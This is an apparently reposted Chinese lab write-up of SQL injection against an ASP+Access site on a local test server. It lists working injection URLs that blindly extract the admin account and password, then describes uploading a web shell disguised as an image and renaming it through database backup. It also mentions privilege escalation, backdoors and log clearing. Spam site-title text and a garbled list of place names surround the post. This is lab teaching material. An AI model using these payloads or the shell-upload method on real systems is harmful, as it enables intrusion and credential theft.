91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

實驗十一:sql注入之asp+access案例

發布時間:2020-06-17 14:58:45 來源:網絡 閱讀:4829 作者:vbers 欄目:MySQL數據庫

僅供學習參考,2013.5.8日學習整理記錄

潛江水產案例
(sql注入之asp+access)
實驗目的通過注入漏洞上傳config.asp
實驗過程如下所示:
實驗前提:在服務器上要搭建好IIS
開始實驗
把已經編好的web通過共享的方式上傳到服務器上,然后解壓這個潛江水產的數據包
文件,然后把這個數據包導入到c:\inetpub\wwwroot下面,接著通過命令行inetmgr打開
搭建好的默認網站,然后在默認網站中的主目錄下面指定潛江水產的路徑,然后在配置中的設置中啟用父路徑,在指引中添加index.asp,然后在網絡擴展中把asp給啟動
網站服務器一切準備好后,在客戶端來訪問一下潛江水產的服務器
現在我們就要利用編程的簡單的查詢來推斷網站是否存在注入漏洞
訪問網站后,在地址欄輸入:http:\192.168.2.4,然后在網頁中找到一個武漢水產專家,
當出現地址為:http://192.168.2.4/shownews.asp?id=41時,這就是典型的注入漏洞
我們可以用下面可以到shownews.asp中查看一下看有沒有“武漢水產專家”,發現找不到,說明這個新聞頁面時保存在數據庫里面的
現在我們到數據庫中查詢一下“select”
下面是搭建好潛江水產的web頁面
實驗十一:sql注入之asp+access案例
實驗十一:sql注入之asp+access案例

http://192.168.2.4/shownews.asp?id=41查詢正常

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

我們可以用三種方法來確定它存在注入漏洞
1.http://192.168.2.4/shownews.asp?id=41’查詢不正常
實驗十一:sql注入之asp+access案例
2.http://192.168.2.4/shownews.asp? id=41 and 1=1查詢正常
實驗十一:sql注入之asp+access案例

3.http://192.168.2.4/shownews.asp? id=41 and 1=2查詢不正常
實驗十一:sql注入之asp+access案例

4.http://192.168.2.4/shownews.asp?id=41 and select username,password from user查詢報錯

實驗十一:sql注入之asp+access案例

5.http://192.168.2.4/shownews.asp?id=41 and 0<>(select count(*) from admin)正常訪問

實驗十一:sql注入之asp+access案例
6.http://192.168.2.4/shownews.asp?id=41 and 0<>(select count(*) from admin1)不正常訪問

實驗十一:sql注入之asp+access案例

7.http://192.168.2.4/shownews.asp?id=41 and 0<>(select count(user) from admin)查詢正常

實驗十一:sql注入之asp+access案例

8.http://192.168.2.4/shownews.asp?id=41 and 0<>(select count(password) from admin)

實驗十一:sql注入之asp+access案例

9.http://192.168.2.4/shownews.asp?id=41 and (select top 1 len (user)from admin)>0 正常

實驗十一:sql注入之asp+access案例

10.http://192.168.2.4/shownews.asp?id=41 and (select top 1 len (user)from admin)>1正常

實驗十一:sql注入之asp+access案例

11.http://192.168.2.4/shownews.asp?id=41 and (select top 1 len (user)from admin)>2 正常,知道出現報錯就是那個數,這樣一個一個的嘗試,直到出現報錯時為止。那么密碼的長度就為那個報錯的位數,接下來就是猜密碼了
實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

12.http://192.168.1.10/shownews.asp?id=41 and (select top 1 asc(mid(user,1,1))from admin)>0出現錯誤

實驗十一:sql注入之asp+access案例
13.http://192.168.1.10/shownews.asp?id=41 and (select top 1 asc( mid(username,1,1))from admin)>0正常

實驗十一:sql注入之asp+access案例

14.http://192.168.1.10/shownews.asp?id=41 and (select top 1 len(username)from admin )>1

實驗十一:sql注入之asp+access案例

15.http://192.168.1.10/shownews.asp?id=41 and (select top 1 len(username)from admin )>2 剛剛前面出現了問題,現在又要重新的再來猜一遍,直到猜出報錯時為止,那么密碼的長度就為出現報錯的那個數
實驗十一:sql注入之asp+access案例

16.http://192.168.1.10/shownews.asp?id=41 and (select top 1 asc(mid(username,1,1))from admin)>0 現在來猜管理員的帳號

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例
下面是用小葵來一步一步的破解密碼的過程
實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

17.http://192.168.2.4/shownews.asp?id=41 and (select top 1 len (password)from admin) >0 現在猜密碼的長度

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

18.http://192.168.1.10/shownews.asp?id=41 and (select top 1 asc(mid(password,1,1))from admin)>0 現在就猜密碼為多少
實驗十一:sql注入之asp+access案例

下面是用小葵來一步一步的破解密碼

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

現在管理員的帳號已經查出來了,管理員的密碼也猜出來了
接下來就要開始注入了
在潛江水產網的下面找到“網站管理”,然后輸入管理員的帳號和密碼就可以直接訪問后臺
然后找到新聞的編輯頁面,在這里面找到插入圖片,你就可以利用這個漏洞來上傳圖片,也就把config.asp這個文件傳上去了,但是這里文件只有jpg,gpf,那么你就要
回到客戶端,把config.asp的后綴名改為gpf或jpg內型的,
然后找到這個文件存放的地方,在客戶端的地址欄中輸入這個地址,發現不能夠訪問
然后在系統管理中找到上傳文件,然后找到數據庫備份,然后把文件備份一下,并找到備份的路徑
然后把圖片的路徑保存在當前的數據庫下,然后把保存的數據庫的名稱的后綴名更改一下,
然后復制這個地址,然后在地址欄中輸入這個confi.asp文件的路徑

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例
實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

在這里需要把里面的內容填寫一下,然后再上傳,然后找到上傳后的路徑地址

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

實驗十一:sql注入之asp+access案例

下面就可以一步一步的通過config.asp來上傳文件,然后提權,然后遠程登錄,然后做后門,然后清除日志等一系列的操作,在這里我就不演示了

實驗十一:sql注入之asp+access案例

總結:僅供學習參考,資料來源于2013.5.8日學習整理,請勿做違法犯禁事情,違者自咎,我只是提供一個學習平臺,僅供學習參考,希望大家把這個拿來作為公司的安全防護做漏洞測試,請勿用來作侵害他人財產或者經濟損失及個人隱私安全泄露的事情,違者當事人自負,注意,此僅僅是供學習參考借鑒使用,請勿做違法事情

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

安达市| 潍坊市| 西安市| 井研县| 宜兴市| 如皋市| 来安县| 东平县| 新津县| 连城县| 株洲市| 邓州市| 阳泉市| 南郑县| 定南县| 隆尧县| 旬邑县| 乐平市| 若尔盖县| 洛宁县| 融水| 溆浦县| 阿图什市| 江永县| 水富县| 南京市| 陆河县| 天等县| 金昌市| 长兴县| 阳谷县| 奉节县| 柘城县| 即墨市| 清新县| 来凤县| 宁波市| 徐汇区| 同仁县| 义马市| 霍邱县|